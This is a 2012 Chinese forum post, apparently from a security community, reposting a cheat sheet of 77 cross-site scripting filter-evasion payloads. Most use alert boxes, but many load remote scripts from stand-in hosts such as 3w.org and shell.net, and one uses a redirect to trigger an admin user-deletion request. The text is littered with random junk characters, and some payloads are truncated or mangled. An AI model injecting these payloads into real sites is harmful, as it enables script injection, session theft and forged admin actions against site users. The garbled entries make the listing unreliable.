貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
' R5 W2 Z y3 W# k% O! I s% X( ?: w" @
(1)普通的XSS JavaScript注入; q! m1 v. `% j# V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, u. t" o0 u# ~' z7 C
( w' s5 M: c, i' {& j/ ?: T (2)IMG标签XSS使用JavaScript命令
$ B* D I5 u2 u; j7 Q/ W7 N <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 T& E- d( U3 m# W3 Y) o7 w
+ m6 B* y2 V1 p# k4 D$ ]" A/ @5 _
(3)IMG标签无分号无引号! Z7 T' g! G! @: j9 i* O& Y" t; P
<IMG SRC=javascript:alert(‘XSS’)>+ u2 Z8 F7 w) f4 t3 K
% F5 ]2 r( }9 H (4)IMG标签大小写不敏感! R1 c( w, e9 k. R T
<IMG SRC=JaVaScRiPt:alert(‘XSS’)> P/ |- e! G" i
4 w$ T- U! ]/ k' k* w* |# q+ ?5 |8 y (5)HTML编码(必须有分号)
1 h4 T1 O- t& m$ T L( S% i <IMG SRC=javascript:alert(“XSS”)>+ D9 w' G/ Q/ r! p
5 y8 Q" N+ ~) e) B8 [: C) e (6)修正缺陷IMG标签 U5 u) C7 Q+ j- C/ H G1 [
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
8 G% t+ s% H$ ?* A/ R0 l$ e
1 C) O; c' W7 ^ O (7)formCharCode标签(计算器)
; z) U$ K. S7 g# b8 j <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 s0 @1 Z7 v$ f+ U% f4 Z7 ? P! f# N4 n! k5 o
(8)UTF-8的Unicode编码(计算器)1 u% h s$ Q: A) s
<IMG SRC=jav..省略..S')>: K" U: I8 B, Y! _# R% f
* X6 P6 ?; d3 A& g) E# E, N/ Z; P (9)7位的UTF-8的Unicode编码是没有分号的(计算器)$ ^. ]7 O0 @ P _! s$ w
<IMG SRC=jav..省略..S')> h9 A4 {- E3 _" a
! w+ I% u& ^( }0 K (10)十六进制编码也是没有分号(计算器)) x# r$ G4 ^ O) [ S2 ~" k2 l
<IMG SRC=java..省略..XSS')>8 d6 F/ Z9 g/ M2 J: M' y, T
8 w) m2 ?4 P B% |7 j F (11)嵌入式标签,将Javascript分开
' a+ X5 o. c( p4 o <IMG SRC=”jav ascript:alert(‘XSS’);”>4 ?. t" P$ u( ^" b9 ?, ^9 F
4 w( y" ]* ?9 {8 j (12)嵌入式编码标签,将Javascript分开
2 S3 j. `) G# S: d2 K1 @# V <IMG SRC=”jav ascript:alert(‘XSS’);”>8 P, j# h& ]% `2 P) p8 w7 J% {
9 {( h9 f$ q. _ (13)嵌入式换行符( d( E! E" T( K0 [/ S
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# u% O( l2 y% ?3 Z) U! l {" Y7 i" m8 {5 S; E' I$ ^
(14)嵌入式回车
8 j. z; o/ @) @ `% g <IMG SRC=”jav ascript:alert(‘XSS’);”>
9 O& X4 z4 J+ n% k( u
6 |4 |1 V2 B1 N (15)嵌入式多行注入JavaScript,这是XSS极端的例子
& Y0 t# A2 g) N" ?6 q <IMG SRC=”javascript:alert(‘XSS‘)”>
5 z5 E9 [9 ?3 w3 S: j% z* U9 z( X' H, m. F4 {* E/ h) J$ x2 q# ]
(16)解决限制字符(要求同页面), t; g( [" _9 }/ A0 e
<script>z=’document.’</script>4 J. ?6 M+ p( [8 ~
<script>z=z+’write(“‘</script>1 A0 V- V7 l0 ~& l, }' h0 W
<script>z=z+’<script’</script>
! j, ^5 O- j" s8 i$ ~5 Q <script>z=z+’ src=ht’</script>
3 G% E3 V- k2 E6 C1 q1 i <script>z=z+’tp://ww’</script>
, p, V- x7 l9 ]. _ <script>z=z+’w.shell’</script>
3 F' ?( k2 D" H; f- B <script>z=z+’.net/1.’</script>% C4 `7 [8 T# \- }
<script>z=z+’js></sc’</script>
2 n3 b, Q- S; d <script>z=z+’ript>”)’</script>
# R& K* X5 E! |0 p) [8 @6 X/ Y <script>eval_r(z)</script>3 R; O# B1 [; A9 O+ x
7 \3 x1 {% Z* s7 |7 g5 `
(17)空字符
; O3 p0 e: F7 {* a0 q1 ` perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out' W+ t& h6 n ^4 t' Y
' {, P7 N) j4 C6 Q (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
. g$ J5 G9 n! h* E0 p& O5 w0 } perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
" X* v8 R0 t! @2 x/ K
2 x7 O9 ^# I V9 z( e/ \ (19)Spaces和meta前的IMG标签
! ^) }8 x3 ]0 g# y/ J$ ~3 Y+ |% J( w <IMG SRC=” � javascript:alert(‘XSS’);”>
$ d" y$ k/ Y9 L, I) Z/ F4 V# P; t! ~9 {" `9 J
(20)Non-alpha-non-digit XSS
, Y- u, L; J; E4 \; g U <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 S. f4 T' h( j2 P4 O$ ^. [2 i; `/ g5 p) v5 `0 ?8 r$ {" |
(21)Non-alpha-non-digit XSS to 2
8 v7 X! Y: G+ U k <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 I/ v7 w$ b- D9 k0 d% M
0 ^$ o/ u0 L6 `! N- N (22)Non-alpha-non-digit XSS to 3
: p/ @! f/ r. X7 q! _ <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- x8 a, J1 B& v1 d# ?' L
( I! E2 f" H/ Y; [3 ]* a
(23)双开括号$ A' v7 a3 R# a4 y# m) K1 @
<<SCRIPT>alert(“XSS”);//<</SCRIPT>, `+ A# v. Z4 f- h% v0 h/ J# }
8 [) B2 r8 d5 G. \# ]' p2 K& t! T3 \, k
(24)无结束脚本标记(仅火狐等浏览器)
- _+ ~: k4 J+ y. z9 q <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>, E: ?5 }: r) T# U. n& T
6 c( e4 H6 L; X- f2 F# X (25)无结束脚本标记2 N7 N5 ~7 |, Z z6 Q r
<SCRIPT SRC=//3w.org/XSS/xss.js>
5 x) G# U3 M; y4 r
+ ?$ V& u( Y2 J3 M, i (26)半开的HTML/JavaScript XSS0 y9 [& T; `( S" @- [( t# @% C j* n
<IMG SRC=”javascript:alert(‘XSS’)”
5 E0 F" q+ }* T8 E* \' B/ p* h+ W$ n E! Z1 C
(27)双开角括号
7 k& Y2 }! l7 k3 @ <iframe src=http://3w.org/XSS.html <: F4 C2 A% p# t y; n
7 r9 h* [ Z9 a4 G& ` (28)无单引号 双引号 分号- U% Y' e+ B0 Y7 ?+ p
<SCRIPT>a=/XSS/" _1 W% k# K4 J% ?! m8 T. t, B
alert(a.source)</SCRIPT>2 j0 }1 D, C2 ? `# g) ~
+ x, `. ]0 l) X% [" {! W
(29)换码过滤的JavaScript
" M+ h% O* O, Y" m \”;alert(‘XSS’);//2 O7 J- D/ W7 q
8 v( h9 `/ T. w3 z1 d6 k/ Z (30)结束Title标签4 @" \2 x* L6 ?% K5 j: `8 F
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( k. Y5 X+ }/ l, |3 n: j4 @! y5 K2 l X9 Y) w
(31)Input Image7 i1 _% f+ a. U' n# {
<INPUT SRC=”javascript:alert(‘XSS’);”>
: J2 K# G9 d6 H' v7 W0 v+ P
- J9 ?& P5 M/ o5 E4 x (32)BODY Image
) M1 V/ h% _" l- i <BODY BACKGROUND=”javascript:alert(‘XSS’)”>/ ]0 p) ~! Y- Y6 T0 @1 C. v& A
- W2 n0 _: Q. A2 g0 E (33)BODY标签
. J. m t- K# z3 @ Z <BODY(‘XSS’)>
5 u1 ^3 h( I$ i1 B
+ Q/ U( u6 @, s3 |8 t (34)IMG Dynsrc
4 ~. q+ j- [3 e# }- k3 i) l- R& e; S <IMG DYNSRC=”javascript:alert(‘XSS’)”>" B4 d1 W5 n* c* o& ^! L& X
1 m& n! [5 P# m2 g
(35)IMG Lowsrc
( ^5 T- ?3 a) _: @6 G3 k2 { <IMG LOWSRC=”javascript:alert(‘XSS’)”>
# Z8 X3 {! P7 f7 A# r: D' W5 w- e7 l: t: F# J" v I& r
(36)BGSOUND
Q7 {7 Y9 Y5 I* m) V U: Z7 c" g; d <BGSOUND SRC=”javascript:alert(‘XSS’);”>7 B8 q* C7 Z5 b9 }
; X$ Z9 w9 X3 j, _) q4 N
(37)STYLE sheet) l" `0 a7 p9 O) g7 t& e( Q' X
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>& x3 }* {/ A3 }4 o4 Z t1 [6 L
- [ I/ Q( L7 Q
(38)远程样式表' U$ a' O5 h$ X a7 H A
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
+ r. c. s+ P7 F4 e" O" Y6 P6 Y
' W. c i7 A; u2 A (39)List-style-image(列表式)
6 M6 ~8 b6 _/ A* [( ]5 l. y <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
0 L! s$ H# G9 w) z5 x( z6 d
& N% x( j0 S6 y0 l% v+ Q (40)IMG VBscript
: [; K! c, N3 a4 [( ~9 g1 w( O <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
+ B8 D% Q5 _* y* I& m
[3 _ h5 L4 o' ~ (41)META链接url' ]+ M" m$ C5 ^
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
- a g/ N) m3 z2 C/ A; ~: c/ x2 ]7 S. l: h/ |4 d
(42)Iframe
& \( U' c; O) s2 z5 k& `" A7 b$ m <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
: \" E( y6 b& p1 t3 C2 i0 @8 t0 [: x0 i' v# i
(43)Frame
5 K! {! i! r1 h0 f <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
$ o" h' c I, Q# `$ E$ Y
: W/ i2 w2 r B+ f% ?3 Q( \8 r (44)Table8 F/ s3 s* c d; t: ]5 s
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
# C" T3 \! N. X1 _ l, ^, @
3 b8 L. F$ K O5 g8 F" q (45)TD" I( o: h% ^- j& t( t% i
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>2 U6 {8 n' D( W: z) U
7 D0 `# K( @; I* ] (46)DIV background-image
- m0 \) O" @! F2 F G2 p <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" X( k% G# ]% |" l B1 P3 G9 y+ L3 M8 ?. A
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
4 q8 H' s9 w) e; j1 ^7 A <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
4 E W6 q; O; n6 U3 M# z" T
7 f- P3 d" U% B) D- e" T& G (48)DIV expression
5 c9 y& l! W0 v. r& `* p( T; @ <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
- F, Z: Y# {9 b( V* t; {- n2 I% R$ N: i' ]' j' U
(49)STYLE属性分拆表达
& U8 }3 a, p- ]# B N <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
6 L6 c2 n8 {: i0 r& F' |3 b b5 l$ m& e4 Q
(50)匿名STYLE(组成:开角号和一个字母开头)1 l1 e+ n" R9 @. y# @: t; f' _
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>9 }/ f0 `5 [- W) {
* |2 k: F* m. R$ p
(51)STYLE background-image; {2 N" Y- ^9 E# N3 ^# G8 b- f
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
% @" Y; q z* f* H/ o! C- K( a) k4 q: l
5 e- i. M: F" g0 g! Y1 b5 M (52)IMG STYLE方式
, s X$ e$ Q2 s+ G* h exppression(alert(“XSS”))’>
1 A! H+ Q8 C! e n1 z7 @
' J1 ^( \+ V8 p: _1 y5 b! Q9 E5 E (53)STYLE background! t" h, {9 @% b
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 {: v7 r2 H" v3 s
- w: Q1 F! b( f: U3 [ (54)BASE2 @# x9 v+ t2 f& g" U
<BASE HREF=”javascript:alert(‘XSS’);//”> _) B4 y: Q# G' O) r
0 Q% x$ n8 _9 t: P. i
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
( R, P/ l0 v. `+ C. z! \0 c7 l <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>, G% p0 C+ U% N6 C
" `2 @% G; d& G0 B (56)在flash中使用ActionScrpt可以混进你XSS的代码$ [6 @; |4 K2 K2 V. @) q
a=”get”;
9 I0 f( c; u* W h: H2 u( N b=”URL(\”";
7 |2 W1 G: d" `) d: v9 [- E c=”javascript:”;
! v# ?1 A4 { b N/ ~) P( } d=”alert(‘XSS’);\”)”;
8 T7 a$ x+ j4 P9 n% N eval_r(a+b+c+d);9 l& R# }; W& @) J
@& l; @+ n9 [) @5 \
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% `0 n* A) E; N <HTML xmlns:xss>
; z, h9 b& b$ @2 A/ Q! O% Q8 p0 E0 g <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
/ y6 f/ h& u# [3 R [ <xss:xss>XSS</xss:xss>9 b/ O/ {+ i0 {. S$ l
</HTML>
5 G) L# W& I8 a
+ H Y7 v- D6 I. r* b/ X2 }2 ]+ x (58)如果过滤了你的JS你可以在图片里添加JS代码来利用9 z0 c9 X, F* c: ~# `
<SCRIPT SRC=””></SCRIPT>
f' v3 `9 ] H. G z+ }& C, P. @" q" w2 D4 n& h
(59)IMG嵌入式命令,可执行任意命令
2 {! L8 a. w. T) v3 U- J) s <IMG SRC=”http://www.XXX.com/a.php?a=b”>9 N1 y+ i0 T# R, f" q7 k
& Q1 [# e9 `" @, `
(60)IMG嵌入式命令(a.jpg在同服务器)+ F' a O8 @5 U! H2 c z
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- q% e$ Q& g* a! z1 ?" p- A' Y/ [% Z9 V
! o9 H" O8 l6 g8 P (61)绕符号过滤
, D; f( Z' Q( k9 H* }. a <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 E! Q& i; Z1 K: s9 X
' {2 `1 d4 k; h/ Q (62)" d, u' C+ G$ V7 X( m, o
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 S, |. n8 J; m# {) p" G) D/ h% l" S
(63)6 V0 x* Q3 p+ V1 J2 ? C
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
" |4 d. _0 `' U$ h. D/ v" y9 a/ Y, Q4 O) _. x( R
(64)
. ]" A% j% @# a$ H: ] <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
( d9 P! A4 O! X# Z0 l6 B1 K s2 M5 R( t
(65)
7 W$ z! I& a6 w- y! S+ N! y <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
9 }5 Y; t' ]- Y4 k# `
. S, Q! |( b6 l (66)5 i9 B* W; y' T, Z' X/ N5 J
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>2 a5 F. i0 `' x6 ]; N9 Q% K3 u
/ D: u+ O% z5 e6 R& y& b (67)) J) V% A- z! R& ^; a6 X
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
" C* l# e2 w/ Q) E7 ~( f
, A8 e5 d( t$ }+ e. I (68)URL绕行& W9 q) ]& [$ e6 \( h; M
<A HREF=”http://127.0.0.1/”>XSS</A>
0 F( E" M! p1 v6 f
3 ?/ i+ X8 {& f (69)URL编码
. o* `0 i; }# H$ ]: Y3 W" S <A HREF=”http://3w.org”>XSS</A>7 o/ a. v9 o7 z/ e6 H2 C2 {( r
& g! }. v& V0 K9 _8 H( T (70)IP十进制7 s9 L. \' v6 I# X9 _
<A HREF=”http://3232235521″>XSS</A>
* s' J: C/ _/ I1 H: Q& q% f% m' z& m! a* W& \$ p
(71)IP十六进制
5 M8 w" p% X/ A9 T9 Q6 ?) F <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>9 J/ ^8 m" s% D7 Y( r
9 ^/ y( x0 M/ U9 q; q3 V7 k (72)IP八进制
- j! f& K w0 B <A HREF=”http://0300.0250.0000.0001″>XSS</A>
. N$ O: x# H X
; x5 z; c! Q F! ~- M2 K. f1 X* T (73)混合编码
8 q$ o7 I4 o& f* O9 J/ H4 j8 w <A HREF=”h
7 @# q) K, Q' A4 M tt p://6 6.000146.0×7.147/”">XSS</A>3 S) ^% _, u- [9 s4 [
6 g7 P1 y% @: E# u (74)节省[http:]( p) l+ @3 \. [ s# u; \6 t
<A HREF=”//www.google.com/”>XSS</A>) _/ m) ]5 g% ?, E0 G* H
! ]$ ?$ ^7 n D- i
(75)节省[www]6 v( o) S) l7 s8 o& V
<A HREF=”http://google.com/”>XSS</A>
4 p8 S4 }1 v' A# u1 {0 `2 q/ q: s/ V
. o! e1 Z; q: Z5 j | (76)绝对点绝对DNS# u1 ?% h8 p, R# {& L. V
<A HREF=”http://www.google.com./”>XSS</A>
# A+ R5 _) } x# J( V
^' ^6 b( |7 f f8 G (77)javascript链接
- d3 S% T9 t. Q& J2 i$ v <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对